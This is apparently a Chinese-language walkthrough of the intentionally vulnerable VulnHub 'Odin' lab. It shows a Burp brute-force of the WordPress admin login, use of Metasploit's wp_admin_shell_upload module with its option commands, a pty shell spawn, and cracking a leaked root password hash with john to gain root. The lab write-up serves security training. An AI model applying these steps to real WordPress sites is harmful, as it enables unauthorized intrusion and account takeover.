vulnhub--odin
描述
难度:容易
奥丁以乔格海姆(Vegtam)的行者的名义冒险前往约特海姆(Jötunheim)附近的米米尔(Mimir)井。守卫井的米米尔(Mimir)允许他从井里喝水,他要求他牺牲左眼,这是他获取知识的意愿的象征
请添加/ etc / hosts-> ip vm + odin
例如:192.168.1.1 odin
推特:@ArmBjorn
在Virtualbox中工作。
获取root权限
由于靶机中许多许多url使用了odin,没有动态获取,因此需要加一条本地dns
编辑C:\Windows\System32\drivers\etc\hosts
底部添加 IP地址 odin
目录
一、信息收集
1.nmap端口扫描:
2.dirsearch目录扫描:
二、漏洞探测&利用
1. burp爆破
2. getshell
1.过上传插件的方式将我们的一句话木马插入到根目录中
2 . metasploit反弹shell
四、提权
1.查询www下的配置文件wp-config.php
2.john解密
五、总结
一、信息收集
1.nmap端口扫描:
2.dirsearch目录扫描:
python3 dirsearch.py -u 192.168.155.132 -e php
找到后台目录,访问http://odin/wp-login.php
二、漏洞探测&利用
1. burp爆破
用户名admin密码不正确,burp爆破。
密码为:qwerty
登入后台管理。
2. getshell
1.过上传插件的方式将我们的一句话木马插入到根目录中
但是找不到文件的绝对路径。
2 . metasploit反弹shell
search wordpress shell
搜索与wordpress 的payload
use exploit/unix/webapp/wp_admin_shell_uploadoptionsset password qwertyset username adminset rhost 192.168.155.132 #目标iprun
shellpython3 -c "import pty;pty.spawn('/bin/bash')"
四、提权
1.查询www下的配置文件wp-config.php
2.john解密
/** root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/
将密文保存到pass.txt
john pass.txt && john --show pass.txt
解得:root/jasmine
3.su
su root
五、总结
- 知道cms的管理员的账号密码,但很难利用上传点时,msf> use exploit/unix/webapp/wp_admin_shell_upload
- john解密
vulnhub--odin相关推荐
- VulnHub渗透测试实战靶场 - Odin:1
VulnHub渗透测试实战靶场 - Odin:1 题目描述 环境下载 NULLY CYBERSECURITY: 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 题目描述 Odin v ...
- 三星手机如何分屏_刷机基础知识三星如何手机进入ODIN模式
提示:点击上面的蓝字可以快速关注我们. 经常刷机的三星用户对ODIN这个词肯定都再熟悉不过了,不过仍然有许多新手用户对于如何进入ODIN模式还是一知半解,所以抽空整理了一下,如有写错的地方请大家纠正一 ...
- easyui表格编辑事件_Unity手游开发札记——从Odin插件聊基于元数据的编辑器实现
Metadata is data that provides information about other data. 最近一个多月的时间在全力做新项目的Demo,由于程序暂时还只有我一个人,所以从 ...
- 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!
Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...
- Vulnhub靶机渗透之 RAVEN: 1
目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- 【Vulnhub靶机系列】DC2
基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...
- 【Vulnhub靶机系列】DC1
基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...
- 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...
- 靶场练习第二十二天~vulnhub靶场之Momentum-2
一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...
最新文章
- AsyncTask使用方式一
- linux源码包编译安装与rpm安装方法介绍
- iPhone/iOS图片相关(读取、保存、绘制、其它相关)
- LeetCode 454. 四数相加 II(哈希)
- django外调用url_Django url
- oracle11gR版本GI中新增,Oracle11g新特性MemberKillEscalation简介
- bootstrap学习5-栅格系统
- BOM对象有哪些,列举window对象?
- Xcode12.3 、12.4 运行 iOS15 :The code signature version is no longer supported
- BUUCTF-Misc-No.3
- 利用jackson-dataformat-xml包中的XmlMapper类将xml解析成实体类对象
- php服务器代维,服务器维护
- Nature子刊:使用纳米孔测序从微生物组中得到完整闭环的细菌基因组
- StringBuffer去掉最后一个字符
- 【前端】jQuery上传图片插件 : uploadifive
- 解决阿里云OSS使用URL无法访问图片
- 如何旋转图片方法#ps教程#ps学习#ps修图抠图
- 12.1.2、Doris__基本使用、doris的基本命令、建表概念、语句、建表语法、建表方式(引擎存储规则)、导入数据的方式、支持的数据类型、rollup索引
- 计算机中汉字的顺序有什么排列,汉字演变过程的时间排序是什么?
- 机器学习——关联规则